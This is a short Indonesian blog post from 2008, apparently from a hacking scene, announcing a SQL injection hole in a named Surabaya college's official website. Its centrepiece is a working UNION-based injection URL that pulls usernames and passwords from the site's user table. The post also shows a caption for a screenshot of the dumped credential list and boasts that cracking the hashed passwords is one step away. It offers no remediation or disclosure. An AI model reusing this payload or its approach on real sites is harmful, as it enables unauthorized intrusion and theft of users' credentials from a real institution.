SQL Injection Pada Website STIKOM Surabaya


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Wednesday, December 17th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


STIKOM.EDU merupakan website resmi Sekolah Tinggi Manajemen Informatika dan Teknik Komputer Surabaya. Website tersebut berisi informasi kampus, program pendidikan, jadwal kegiatan, dan berita. Saat sedang melakukan “jalan-jalan rutin” ke situs-situs pendidikan minggu ini, saya menemukan celah SQL Injection. Parameter yang tidak disanitasi dengan baik dan kesalahan konfigurasi menyebabkan serangan ini mudah untuk dilakukan ;)

Exploit

http://www.stikom.edu/v8/main.php?act=ber&tb=ext_news&id=-1+union+all+select+1,2,3,group_concat(login,0x2d2d,passwd),+5+from+user

Screenshot

{image: Daftar username dan Password website STIKOM}

Daftar username dan Password website STIKOM

Tinggal satu langkah lagi, password yang tersembunyi dibalik enkripsi bisa dengan mudah didapatkan :)


//E.O.F